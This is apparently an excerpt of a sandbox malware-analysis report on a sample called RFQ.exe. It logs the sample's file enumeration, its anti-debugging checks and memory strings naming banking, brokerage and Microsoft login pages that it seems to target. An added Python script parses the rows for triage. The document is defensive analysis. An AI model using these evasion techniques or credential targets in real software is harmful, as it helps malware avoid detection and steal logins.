                Source: C:\Program Files (x86)\QrvPXARBoEbtUsiaUykbcLKuPmcBzNKBOrZTpVsKIThgQdPcYEPVmeHBZztkAdHanzPhQdtNVWJ\rNgGAKxrFRkFYx.exe TID: 7716Thread sleep time: -40500s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\net.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\net.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 1_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose,1_2_00452492
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 1_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,1_2_00442886
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 1_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,1_2_004788BD
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 1_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose,1_2_004339B6
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 1_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose,1_2_0045CAFA
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 1_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,1_2_00431A86
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 1_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,1_2_0044BD27
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 1_2_0045DE8F FindFirstFileW,FindClose,1_2_0045DE8F
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 1_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,1_2_0044BF8B
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_030BC820 FindFirstFileW,FindNextFileW,FindClose,11_2_030BC820
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 1_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary,1_2_0040E500
                Source: net.exe, 0000000B.00000002.3124155350.0000000003302000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllU
                Source: F14431U2a.11.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
                Source: F14431U2a.11.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
                Source: F14431U2a.11.drBinary or memory string: Canara Transaction PasswordVMware20,11696492231}
                Source: F14431U2a.11.drBinary or memory string: interactivebrokers.co.inVMware20,11696492231d
                Source: F14431U2a.11.drBinary or memory string: netportal.hdfcbank.comVMware20,11696492231
                Source: net.exe, 0000000B.00000002.3133131236.0000000008187000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,116964922314
                Source: F14431U2a.11.drBinary or memory string: outlook.office.comVMware20,11696492231s
                Source: F14431U2a.11.drBinary or memory string: AMC password management pageVMware20,11696492231
                Source: F14431U2a.11.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
                Source: net.exe, 0000000B.00000002.3133131236.0000000008187000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20
                Source: F14431U2a.11.drBinary or memory string: interactivebrokers.comVMware20,11696492231
                Source: F14431U2a.11.drBinary or memory string: microsoft.visualstudio.comVMware20,11696492231x
                Source: F14431U2a.11.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
                Source: F14431U2a.11.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696492231
                Source: F14431U2a.11.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
                Source: F14431U2a.11.drBinary or memory string: outlook.office365.comVMware20,11696492231t
                Source: F14431U2a.11.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
                Source: F14431U2a.11.dr Binary or memory string: discord.comVMware20,11696492231f
                Source: rNgGAKxrFRkFYx.exe, 0000000C.00000002.3127632599.0000000000810000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: net.exe, 0000000B.00000002.3133131236.0000000008187000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20r
                Source: F14431U2a.11.dr Binary or memory string: global block list test formVMware20,11696492231
                Source: F14431U2a.11.dr Binary or memory string: www.interactivebrokers.comVMware20,11696492231}
                Source: F14431U2a.11.dr Binary or memory string: dev.azure.comVMware20,11696492231j
                Source: F14431U2a.11.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
                Source: net.exe, 0000000B.00000002.3133131236.0000000008187000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ive Brokers - NDCDYNVMware20,11696492231z
                Source: F14431U2a.11.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696492231h
                Source: F14431U2a.11.dr Binary or memory string: bankofamerica.comVMware20,11696492231x
                Source: net.exe, 0000000B.00000002.3133131236.0000000008187000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: look.office.comVMware20,11696492231s
                Source: F14431U2a.11.dr Binary or memory string: tasks.office.comVMware20,11696492231o
                Source: net.exe, 0000000B.00000002.3133131236.0000000008187000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: EU WestVMware20,11696492231n
                Source: F14431U2a.11.dr Binary or memory string: account.microsoft.com/profileVMware20,11696492231u
                Source: F14431U2a.11.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231
                Source: F14431U2a.11.dr Binary or memory string: ms.portal.azure.comVMware20,11696492231
                Source: F14431U2a.11.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
                Source: firefox.exe, 0000000E.00000002.1817648177.000002789422C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllrrT0P
                Source: F14431U2a.11.dr Binary or memory string: Canara Transaction PasswordVMware20,11696492231x
                Source: F14431U2a.11.dr Binary or memory string: turbotax.intuit.comVMware20,11696492231t
                Source: F14431U2a.11.dr Binary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
                Source: F14431U2a.11.dr Binary or memory string: Interactive Brokers - HKVMware20,11696492231]
                Source: C:\Users\user\Desktop\RFQ.exe API call chain: ExitProcess graph end node graph_1-86672
                Source: C:\Windows\SysWOW64\svchost.exe Process information queried: ProcessInformation
                Source: C:\Windows\SysWOW64\svchost.exe Process queried: DebugPort
                Source: C:\Windows\SysWOW64\net.exe Process queried: DebugPort
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_00418F53 rdtsc
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_00417B93 LdrLoadDll
                Source: C:\Users\user\Desktop\RFQ.exe Code function: 1_2_0045A370 BlockInput
                Source: C:\Users\user\Desktop\RFQ.exe Code function: 1_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW
                Source: C:\Users\user\Desktop\RFQ.exe Code function: 1_2_0040EBD0 LoadLibraryA,GetProcAddress
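The anti-debugging evidence in this report is spread over one row per flagged call or instruction (DebugPort queries, rdtsc, IsDebuggerPresent, BlockInput, LdrLoadDll, LoadLibrary/GetProcAddress, and a long run of fs:[00000030h] PEB reads), which is hard to read at a glance. The Python script below is an added example, not part of the Joe Sandbox report and not Joe Security's code: it parses rows in exactly the shape this report uses (tolerating the fused "svchost.exeCode function:" text and the repeated function id that the HTML extraction leaves behind), maps each row to the technique it evidences, and aggregates per process. The technique labels, the flagging threshold and the SAMPLE_ROWS list (copied from rows of this report, plus one unrelated memory-string row) are the example's own choices, not anything the sandbox defines.

```python
"""Added example: summarize Joe Sandbox anti-debugging rows per process.

This script is not part of the Joe Sandbox report and is not Joe Security's
code. It reads rows in the shape this report uses and collapses them into a
per-process view of which anti-debugging techniques were flagged.
"""
import re
from collections import defaultdict

# Row shapes as they appear in the report. The HTML extraction often fuses the
# source path with the signature text ("svchost.exeCode function:") and repeats
# the function id at the end of the row; both forms are accepted here.
CODE_ROW = re.compile(
    r"^Source:\s*(?P<src>.+?)\s*Code function:\s*"
    r"(?P<fid>\d+_\d+_[0-9A-Fa-f]{8})\s*(?P<body>.+?)\s*(?:(?P=fid))?\s*$"
)
PROC_ROW = re.compile(
    r"^Source:\s*(?P<src>.+?)\s*Process(?: information)? queried:\s*"
    r"(?P<what>.+?)\s*(?:Jump to behavior)?\s*$"
)

# Substring in the row body -> technique label (labels are this example's own).
# fs:[30h] is the TEB's pointer to the PEB on 32-bit Windows; reading it is the
# first step of PEB.BeingDebugged / NtGlobalFlag checks, but ordinary runtime
# code reads it too, so the count is a triage aid rather than a verdict.
TECHNIQUES = (
    ("fs:[00000030h]", "peb_read"),
    ("rdtsc", "timing_check"),
    ("IsDebuggerPresent", "isdebuggerpresent"),
    ("BlockInput", "input_blocking"),
    ("LdrLoadDll", "loader_api"),
    ("GetProcAddress", "dynamic_api_resolution"),
)


def classify(body):
    """Return the technique labels evidenced by one row's call/instruction text."""
    return [label for needle, label in TECHNIQUES if needle in body]


def parse_row(line):
    """Parse one report row; returns None for rows that are not anti-debug evidence."""
    m = CODE_ROW.match(line.strip())
    if m:
        body = m.group("body").strip(" ,")   # rows end with a stray comma
        return {"process": m.group("src").strip(), "kind": "code",
                "function": m.group("fid"), "detail": body,
                "techniques": classify(body)}
    m = PROC_ROW.match(line.strip())
    if m:
        what = m.group("what").strip()
        return {"process": m.group("src").strip(), "kind": "query",
                "function": None, "detail": what,
                "techniques": ["debugport_query"] if what == "DebugPort" else []}
    return None


def summarize(lines):
    """Per process: techniques seen, distinct PEB-reading functions, raw PEB reads, rows."""
    acc = defaultdict(lambda: {"techniques": set(), "peb_functions": set(),
                               "peb_reads": 0, "rows": 0})
    for line in lines:
        row = parse_row(line)
        if row is None:
            continue
        e = acc[row["process"]]
        e["rows"] += 1
        e["techniques"].update(row["techniques"])
        if "peb_read" in row["techniques"]:
            e["peb_functions"].add(row["function"])
            e["peb_reads"] += 1
    return {proc: {"techniques": sorted(e["techniques"]),
                   "peb_functions": len(e["peb_functions"]),
                   "peb_reads": e["peb_reads"], "rows": e["rows"]}
            for proc, e in acc.items()}


def flag_processes(summary, min_techniques=2):
    """Processes showing at least min_techniques distinct techniques (threshold is an assumption)."""
    return sorted(p for p, e in summary.items() if len(e["techniques"]) >= min_techniques)


# Constructed input: rows copied verbatim from this report, in the raw extracted
# form, plus one unrelated memory-string row to show that it is ignored.
SAMPLE_ROWS = [
    r"Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior",
    r"Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior",
    r"Source: C:\Windows\SysWOW64\net.exeProcess queried: DebugPortJump to behavior",
    r"Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00418F53 rdtsc 7_2_00418F53",
    r"Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00417B93 LdrLoadDll,7_2_00417B93",
    r"Source: C:\Users\user\Desktop\RFQ.exeCode function: 1_2_0045A370 BlockInput,1_2_0045A370",
    r"Source: C:\Users\user\Desktop\RFQ.exeCode function: 1_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,1_2_0040D590",
    r"Source: C:\Users\user\Desktop\RFQ.exeCode function: 1_2_0040EBD0 LoadLibraryA,GetProcAddress,1_2_0040EBD0",
    r"Source: C:\Users\user\Desktop\RFQ.exeCode function: 1_2_04033528 mov eax, dword ptr fs:[00000030h]1_2_04033528",
    r"Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036B2349 mov eax, dword ptr fs:[00000030h]7_2_036B2349",
    r"Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036B2349 mov eax, dword ptr fs:[00000030h]7_2_036B2349",
    r"Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036B035C mov ecx, dword ptr fs:[00000030h]7_2_036B035C",
    r"Source: F14431U2a.11.drBinary or memory string: discord.comVMware20,11696492231f",
]

if __name__ == "__main__":
    result = summarize(SAMPLE_ROWS)
    for proc, entry in result.items():
        print(proc, entry)
    print("flagged:", flag_processes(result))
```

Feeding the script the whole signature table of a report (one row per line, as exported) turns hundreds of fs:[00000030h] rows into a count of distinct PEB-reading functions per process, which is what matters for triage: a process that combines PEB reads with rdtsc timing and a DebugPort query is a much stronger anti-debug signal than PEB reads alone.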
                Source: C:\Users\user\Desktop\RFQ.exe Code function: 1_2_04033528 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\RFQ.exe Code function: 1_2_04033588 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\RFQ.exe Code function: 1_2_04031EB8 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_036D437C mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_036B2349 mov eax, dword ptr fs:[00000030h] (15 reads)
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_036B035C mov eax, dword ptr fs:[00000030h] (3 reads)
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_036B035C mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_036B035C mov eax, dword ptr fs:[00000030h] (2 reads)
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_036FA352 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_036D8350 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0366A30B mov eax, dword ptr fs:[00000030h] (3 reads)
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0362C310 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03650310 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_036403E9 mov eax, dword ptr fs:[00000030h] (8 reads)
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0364E3F0 mov eax, dword ptr fs:[00000030h] (3 reads)
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_036663FF mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_036EC3CD mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0363A3C0 mov eax, dword ptr fs:[00000030h] (6 reads)
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_036383C0 mov eax, dword ptr fs:[00000030h] (4 reads)
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_036B63C0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_036DE3DB mov eax, dword ptr fs:[00000030h] (2 reads)
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_036DE3DB mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_036DE3DB mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_036D43D4 mov eax, dword ptr fs:[00000030h] (2 reads)
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0362E388 mov eax, dword ptr fs:[00000030h] (3 reads)
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0365438F mov eax, dword ptr fs:[00000030h] (2 reads)
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03628397 mov eax, dword ptr fs:[00000030h] (3 reads)
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03634260 mov eax, dword ptr fs:[00000030h] (3 reads)
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0362826B mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_036E0274 mov eax, dword ptr fs:[00000030h] (12 reads)
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_036B8243 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_036B8243 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0362A250 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03636259 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_036EA250 mov eax, dword ptr fs:[00000030h] (2 reads)
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0362823B mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_036402E1 mov eax, dword ptr fs:[00000030h] (3 reads)
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0363A2C3 mov eax, dword ptr fs:[00000030h] (5 reads)
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_036402A0 mov eax, dword ptr fs:[00000030h] (2 reads)
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_036C62A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_036C62A0 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_036C62A0 mov eax, dword ptr fs:[00000030h] (4 reads)
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0366E284 mov eax, dword ptr fs:[00000030h] (2 reads)
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_036B0283 mov eax, dword ptr fs:[00000030h] (3 reads)
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_036C4144 mov eax, dword ptr fs:[00000030h] (2 reads)
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_036C4144 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_036C4144 mov eax, dword ptr fs:[00000030h] (2 reads)
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0362C156 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_036C8158 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03636154 mov eax, dword ptr fs:[00000030h] (2 reads)
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03660124 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_036DE10E mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_036DE10E mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_036DE10E mov eax, dword ptr fs:[00000030h] (2 reads)
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_036DE10E mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_036DE10E mov eax, dword ptr fs:[00000030h] (2 reads)
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_036DE10E mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_036DE10E mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_036DE10E mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_036DA118 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_036DA118 mov eax, dword ptr fs:[00000030h] (3 reads)
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_036F0115 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_037061E5 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_036601F8 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_036F61C3 mov eax, dword ptr fs:[00000030h] (2 reads)
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_036AE1D0 mov eax, dword ptr fs:[00000030h] (2 reads)
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_036AE1D0 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_036AE1D0 mov eax, dword ptr fs:[00000030h] (2 reads)
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03670185 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_036EC188 mov eax, dword ptr fs:[00000030h] (2 reads)
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_036D4180 mov eax, dword ptr fs:[00000030h] (2 reads)
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_036B019F mov eax, dword ptr fs:[00000030h] (4 reads)
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0362A197 mov eax, dword ptr fs:[00000030h] (3 reads)
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0365C073 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03632050 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_036B6050 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0362A020 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0362C020 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_036C6030 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_036B4000 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_036D2000 mov eax, dword ptr fs:[00000030h] (8 reads)
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0364E016 mov eax, dword ptr fs:[00000030h] (4 reads)
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0362A0E3 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_036380E9 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_036B60E0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0362C0F0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_036720F0 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_036B20DE mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_036C80A8 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_036F60B8 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_036F60B8 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0363208A mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03638770 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03640770 mov eax, dword ptr fs:[00000030h] (12 reads)
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0366674D mov esi, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0366674D mov eax, dword ptr fs:[00000030h] (2 reads)
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03630750 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_036BE75D mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03672750 mov eax, dword ptr fs:[00000030h] (2 reads)
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_036B4755 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0366C720 mov eax, dword ptr fs:[00000030h] (2 reads)
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0366273C mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0366273C mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0366273C mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_036AC730 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0366C700 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03630710 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03660710 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_036527ED mov eax, dword ptr fs:[00000030h] (3 reads)
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_036BE7E1 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_036347FB mov eax, dword ptr fs:[00000030h] (2 reads)
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0363C7C0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_036B07C3 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_036307AF mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_036E47A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_036D678E mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_036F866E mov eax, dword ptr fs:[00000030h] (2 reads)
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0366A660 mov eax, dword ptr fs:[00000030h] (2 reads)
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03662674 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0364C640 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0364E627 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03666620 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03668620 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0363262C mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_036AE609 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0364260B mov eax, dword ptr fs:[00000030h] (7 reads)
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03672619 mov eax, dword ptr fs:[00000030h]7_2_03672619
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036AE6F2 mov eax, dword ptr fs:[00000030h]7_2_036AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036AE6F2 mov eax, dword ptr fs:[00000030h]7_2_036AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036AE6F2 mov eax, dword ptr fs:[00000030h]7_2_036AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036AE6F2 mov eax, dword ptr fs:[00000030h]7_2_036AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036B06F1 mov eax, dword ptr fs:[00000030h]7_2_036B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036B06F1 mov eax, dword ptr fs:[00000030h]7_2_036B06F1
